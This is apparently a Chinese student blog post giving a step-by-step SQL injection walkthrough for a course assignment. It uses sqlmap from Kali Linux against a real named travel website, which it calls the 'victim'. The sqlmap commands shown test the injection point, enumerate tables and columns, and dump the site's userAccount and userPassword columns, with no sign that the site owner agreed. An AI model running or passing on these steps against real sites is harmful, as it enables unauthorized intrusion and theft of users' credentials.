商大苦难计算机导论(SQL注入篇)

一、准备工作
如果只在学校的电脑上耍可以跳过;
否则的话
需要安装VM Ware
安装Kali Linux虚拟机
这个教程很详细

https://blog.csdn.net/qq_40950957/article/details/80468030

其实虚拟机迟早都得学,都得用,我建议早点在自己电脑上装上
二、打开VM Ware 和 Kali linux
准备工作做好之后有手就行
三、打开Sqlmap工具
在这儿
商大苦难计算机导论(SQL注入篇)
四、找一个受害者(网站)
网站老师给的PPT里有,这里用最后一个做示范
商大苦难计算机导论(SQL注入篇)
五、进行迫害
1、先看看能不能进行sql注入

PS:让你输入Y/n的时候一律输Y就完了(Y用小写也是可以的);
-u后面的是自己选的网址

sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1

一切正常的话大概会进到这块地方;
说明这个网站是可以的
商大苦难计算机导论(SQL注入篇)
2、爆表名

sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 –tables

一切正常的话…
就能看到两个database(数据库)
这里只贴了一个
商大苦难计算机导论(SQL注入篇)
找到那个类似于user这样的数据表,记下它在哪个数据库下面,实例中是 tourtw_new17tour 这个数据库
商大苦难计算机导论(SQL注入篇)
3、爆列名

user是你刚刚找到的表;名字可能类似user不一定就是user

sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 --columns -T "users"

一切顺利的话…
商大苦难计算机导论(SQL注入篇)
4、就可以看到我们的目标了

就是那个userAccount 和userPassword
记得类比为自己的(小声bb)

sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 --dump -C "userAccount,userPassword"

最终结果
商大苦难计算机导论(SQL注入篇)
六、作业上传

暂时不用交,结课之后交
现阶段只要写个word
把步骤写好,每一步执行后把结果截图贴到word里

上一篇:[Java Spring] @PathVariable, @Vallidated, @PostMapping & @ResponseStatus


下一篇:Gym102082E - Eulerian Flight Tour 题解